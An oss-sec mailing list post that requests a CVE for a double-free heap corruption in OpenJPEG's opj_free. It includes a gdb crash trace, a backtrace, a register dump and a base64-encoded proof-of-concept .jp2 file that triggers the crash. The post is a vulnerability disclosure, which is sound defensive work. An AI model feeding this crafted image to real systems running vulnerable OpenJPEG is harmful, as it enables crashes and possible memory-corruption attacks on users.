oss-sec mailing list archives

CVE request - OpenJPEG : Heap Corruption in opj_free function

From: winsonliu(刘科) <winsonliu () tencent com>
Date: Mon, 14 Mar 2016 06:51:53 +0000
Hi all,

I find a vulnerability of OpenJPEG. The specific flaw exists within the opj_free function. A specially crafted JPEG2000 
image file can force Heap Corruption occurring in OpenJPEG. This issue can be reproduced in the latest version of 
OpenJPEG (https://github.com/uclouvain/openjpeg 2016.03.14).

The detailed information about this issue can be described as follows.
---------------------------------
winson@ubuntu:~/Desktop/repo/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...(no debugging symbols found)...done.

(gdb) r -o image.pgm -i heap_corruption.jp2 
Starting program: /home/winson/Desktop/repo/openjpeg/bin/opj_decompress -o image.pgm -i heap_corruption.jp2

[INFO] Start to read j2k main header (131).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[INFO] Header of tile 1 / 1 has been read.
[INFO] Tile 1/1 has been decoded.
[INFO] Image data has been updated with tile 1.

[INFO] Stream reached its end !
WARNING -> [PGM file] Only the first component
           is written to the file
[INFO] Generated Outfile image.pgm
*** Error in `/home/winson/Desktop/repo/openjpeg/bin/opj_decompress': double free or corruption (!prev): 0x080e7a80 ***

Program received signal SIGABRT, Aborted.
0xb7fdccb0 in ?? ()

(gdb) bt
#0  0xb7fdccb0 in ?? ()
#1  0xb7df933a in malloc_printerr (action=<optimized out>, str=0xb7eebfd0 "double free or corruption (!prev)", 
ptr=0x80e7a80) at malloc.c:4996
#2  0xb7df9fad in _int_free (av=0xb7f30420 <main_arena>, p=<optimized out>, have_lock=0) at malloc.c:3840
#3  0xb7fc849a in opj_free () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#4  0xb7f98096 in opj_image_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#5  0x0804ca8e in main ()

(gdb) x /i $eip
=> 0xb7fdccb0: pop    %ebp

(gdb) i r 
eax            0x0 0
ecx            0x2d5d 11613
edx            0x6 6
ebx            0x2d5d 11613
esp            0xbfff9b94 0xbfff9b94
ebp            0xbfff9e58 0xbfff9e58
esi            0x78 120
edi            0xb7f30000 -1208811520
eip            0xb7fdccb0 0xb7fdccb0
eflags         0x246 [ PF ZF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51


The attachment is the proof-of-concept file.
Alternatively, you can decode the following string using base64 and save the decoded content to a .jp2 file.
---------------------------------
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA
BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABgAAAAiY2RlZgAEAAAAAAACAAEAAAADAAIA
GQADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAA
AAQEDwEEAQEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy
ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch
8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO
HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA
9VfWofCMnawpQPlngP/Z


CREDIT:
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
Attachment: heap_corruption.jp2
Description: heap_corruption.jp2
Current thread:

CVE request - OpenJPEG : Heap Corruption in opj_free function 刘科 (Mar 14)
- Re: CVE request - OpenJPEG : Heap Corruption in opj_free function cve-assign (Mar 16)